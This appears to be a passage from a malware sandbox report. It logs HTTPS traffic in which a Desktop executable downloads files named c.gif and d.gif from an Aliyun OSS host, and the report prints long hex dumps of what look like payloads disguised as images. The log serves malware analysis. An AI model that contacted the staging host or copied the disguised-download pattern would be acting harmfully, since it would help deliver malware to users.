                                                                        2025-01-14 04:11:03 UTC4096INData Raw: 6d 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0
                                                                        Data Ascii: mmkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
                                                                        2025-01-14 04:11:03 UTC4096INData Raw: c2 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9
                                                                        Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                                                                        2025-01-14 04:11:03 UTC4096INData Raw: 19 d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7
                                                                        Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
                                                                        2025-01-14 04:11:03 UTC4096INData Raw: de 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4
                                                                        Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                                                                        2025-01-14 04:11:03 UTC4096INData Raw: 19 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2
                                                                        Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
                                                                        2025-01-14 04:11:03 UTC4096INData Raw: b6 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d
                                                                        Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                                                                        2025-01-14 04:11:03 UTC4096INData Raw: 18 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8
                                                                        Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                                                        2025-01-14 04:11:03 UTC4096INData Raw: 51 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf
                                                                        Data Ascii: QmHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJ


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.11.204975839.103.20.174436476C:\Users\user\Desktop\183643586-388657435.07.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-14 04:11:04 UTC105OUTGET /c.gif HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        User-Agent: Do
                                                                        Host: vien3h.oss-cn-beijing.aliyuncs.com
                                                                        2025-01-14 04:11:05 UTC545INHTTP/1.1 200 OK
                                                                        Server: AliyunOSS
                                                                        Date: Tue, 14 Jan 2025 04:11:05 GMT
                                                                        Content-Type: image/gif
                                                                        Content-Length: 10681
                                                                        Connection: close
                                                                        x-oss-request-id: 6785E3D9998B3E333934B2AB
                                                                        Accept-Ranges: bytes
                                                                        ETag: "10A818386411EE834D99AE6B7B68BE71"
                                                                        Last-Modified: Mon, 13 Jan 2025 12:21:18 GMT
                                                                        x-oss-object-type: Normal
                                                                        x-oss-hash-crc64ecma: 10287299869673359293
                                                                        x-oss-storage-class: Standard
                                                                        x-oss-ec: 0048-00000104
                                                                        Content-Disposition: attachment
                                                                        x-oss-force-download: true
                                                                        Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                                                        x-oss-server-time: 6
                                                                        2025-01-14 04:11:05 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                        Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                        2025-01-14 04:11:05 UTC4096INData Raw: cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66 39
                                                                        Data Ascii: bZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf9
                                                                        2025-01-14 04:11:05 UTC3034INData Raw: 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0 27
                                                                        Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi'


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.11.204975939.103.20.174436476C:\Users\user\Desktop\183643586-388657435.07.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-14 04:11:06 UTC105OUTGET /d.gif HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        User-Agent: Do
                                                                        Host: vien3h.oss-cn-beijing.aliyuncs.com
                                                                        2025-01-14 04:11:06 UTC547INHTTP/1.1 200 OK
                                                                        Server: AliyunOSS
                                                                        Date: Tue, 14 Jan 2025 04:11:06 GMT
                                                                        Content-Type: image/gif
                                                                        Content-Length: 3892010
                                                                        Connection: close
                                                                        x-oss-request-id: 6785E3DAF5B7DD3130647AAB
                                                                        Accept-Ranges: bytes
                                                                        ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                                                                        Last-Modified: Mon, 13 Jan 2025 12:21:29 GMT
                                                                        x-oss-object-type: Normal
                                                                        x-oss-hash-crc64ecma: 3363616613234190325
                                                                        x-oss-storage-class: Standard
                                                                        x-oss-ec: 0048-00000104
                                                                        Content-Disposition: attachment
                                                                        x-oss-force-download: true
                                                                        Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                                                                        x-oss-server-time: 39
                                                                        2025-01-14 04:11:06 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                        Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                        2025-01-14 04:11:06 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                                                        Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
                                                                        2025-01-14 04:11:06 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                                                        Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                                                        2025-01-14 04:11:06 UTC4096INData Raw: 97 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95
                                                                        Data Ascii: -J;wuwu{}uG`uWu{Q6
                                                                        2025-01-14 04:11:06 UTC4096INData Raw: 69 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33
                                                                        Data Ascii: iw#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v|}ThkcJ{K-{u)%|!Q;b:Bmyv)B0.xfcI9a/}pb"3
                                                                        2025-01-14 04:11:06 UTC4096INData Raw: 59 fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50
                                                                        Data Ascii: YeE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
                                                                        2025-01-14 04:11:06 UTC4096INData Raw: 82 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79
                                                                        Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
